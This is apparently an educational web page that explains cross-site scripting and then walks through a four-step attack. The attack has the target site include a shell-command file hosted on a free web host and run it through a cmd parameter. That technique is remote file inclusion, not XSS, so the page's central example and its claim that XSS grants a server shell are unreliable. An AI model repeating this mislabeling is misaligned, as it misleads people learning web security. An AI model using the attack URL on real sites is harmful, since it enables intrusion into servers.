Cross site scripting attacks: CSS or XSS

Cross Site Scripting (CSS for short, but sometimes abbreviated as XSS) is one of the most common application level attacks that hackers use to sneak into web applications today. Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties the attacker, and the web site, or the attacker and the victim client, the XSS attack involves three parties the attacker, a client and the web site. The goal of the XSS attack is to steal the client cookies, or any other sensitive information, which can identify the client with the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site specifically, impersonate the user.

Here is a practical example demonstrating how such an attack can be executed :

Say you set your browser to fully trust your bank's site and allow it to run scripts in your browser. On the other hand, you deny that privilege from the rest of the sites you visit.

If the bank's site is vulnerable to XSS, when you click on a malformed URL that was presented to you at hacker.com, you will be redirected to your banks site (which you previously granted scripting rights) and the malicious script written by someone at hacker.com will run. XSS in that manner is an easy way to run scripts on cautious clients that allow only very specific sites to send them scripts.

These attacks can be so powerful that an attacker can even gain access to the shell of a restricted web server.

STEP 1

Create a free web account on any such free web hosting service providers.

STEP 2

On any location in your web account place a text file with some shell command written in it and save it as shell.txt . In our example we have used Uptime However an attacker may use any such commands.

STEP 3

From his web browser attacker launches the attack using this url:

http://www.targetsite.com/index.php?page=http://www.anyfreewebhost.com/youraccount/shell.txt&?&cmd=uptime

STEP 4

If the web server is not properly patched, the attacker may get a valid response such as :

14:30:29 up 4:27, 4 users, load average: 1.64, 1.05, 0.93

Thus the attacker has successfully gained the shell using a simple XSS exploit. From here on it is quite simple for the attacker to install a malicious code on the clients system that traps any information that might be useful to him.

Phishing Attacks

• Cross Site Scripting (XSS)
• Hidden Frame
• Man in the Middle
• Obfuscation Attacks
  • IDN Spoofing Demo
• Phishing
  • Phishing Quiz
• Graphic based Attacks
  • Fake Browser Address Bar
  • Entire Toolbar Faked
  • Fake SSL Padlock Status Bar